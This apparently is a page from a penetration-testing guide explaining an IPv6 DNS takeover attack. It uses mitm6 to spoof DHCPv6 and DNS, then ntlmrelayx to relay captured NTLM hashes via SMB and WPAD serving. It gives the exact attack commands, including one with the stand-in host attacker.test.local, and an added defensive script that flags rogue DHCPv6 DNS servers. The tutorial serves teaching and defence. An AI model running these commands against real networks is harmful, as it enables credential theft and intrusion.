# Basic attack

The principle is much the same as the one we saw earlier, but more effective.

First we start mitm6, which replies to DHCPv6 requests and afterwards to DNS queries for names in the internal network.

```
mitm6 -d test.local
```
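For the defensive side of this step, the following added example (not part of the original page or of mitm6) parses a captured DHCPv6 server message and flags any DNS server it advertises that is not on an allow-list, since the DHCPv6 reply is what points clients' DNS at the responding host. The allow-list address, the sample messages and all function names are assumptions constructed for illustration.

```python
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7   # DHCPv6 message types sent by servers (RFC 8415)
OPT_DNS_SERVERS = 23      # DNS Recursive Name Server option (RFC 3646)

# Assumption: the resolvers your legitimate DHCPv6 servers hand out.
ALLOWED_DNS = {ipaddress.IPv6Address("2001:db8::53")}


def parse_options(data):
    """Yield (code, value) for each TLV option; stop on a truncated option."""
    pos = 0
    while pos + 4 <= len(data):
        code, length = struct.unpack_from("!HH", data, pos)
        pos += 4
        if pos + length > len(data):
            return
        yield code, data[pos:pos + length]
        pos += length


def advertised_dns(payload):
    """Return the DNS servers offered in a server-to-client DHCPv6 message."""
    if len(payload) < 4 or payload[0] not in (ADVERTISE, REPLY):
        return []
    servers = []
    # Skip the 1-byte message type and the 3-byte transaction id.
    for code, value in parse_options(payload[4:]):
        if code == OPT_DNS_SERVERS and len(value) % 16 == 0:
            servers += [ipaddress.IPv6Address(value[i:i + 16])
                        for i in range(0, len(value), 16)]
    return servers


def rogue_dns(payload, allowed=ALLOWED_DNS):
    """DNS servers in the message that are not on the allow-list."""
    return [s for s in advertised_dns(payload) if s not in allowed]


def build_sample(msg_type, dns):
    """Constructed sample message: header plus one DNS-servers option."""
    body = b"".join(ipaddress.IPv6Address(a).packed for a in dns)
    header = bytes([msg_type]) + b"\x00\x00\x01"
    return header + struct.pack("!HH", OPT_DNS_SERVERS, len(body)) + body


if __name__ == "__main__":
    for sample in (build_sample(ADVERTISE, ["2001:db8::53"]),
                   build_sample(REPLY, ["fe80::1234"])):
        print(rogue_dns(sample) or "ok")
```

Feed `rogue_dns` the UDP payload of packets sent from port 547 to port 546; on networks that do not use DHCPv6 at all, any Advertise or Reply is itself worth an alert.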

For the second part of our attack, we use [ntlmrelayx](https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py) to relay the captured hashes. I will show two possible ways to use this tool. The first is a simple SMB relay like the one we saw earlier:

```
ntlmrelayx.py -6 -tf Targets.txt -socks -smb2support
```

In this case, the attack is much the same as the one we saw earlier; we just replaced Responder with mitm6, for the reasons previously mentioned.

Another attack is possible through **WPAD serving**. WPAD is a protocol used to ensure all systems in an organization use the same web proxy configuration. Instead of individually modifying configurations on each device connected to a network, WPAD locates a proxy configuration file and applies the configuration automatically. More details about this attack can be found in the references. ntlmrelayx also implements this attack; we launch it with the following command:

```
ntlmrelayx.py -6 -wh attacker.test.local -tf targets.txt -l loot -socks -debug
```

**References:**

{% embed url="<https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>" %}
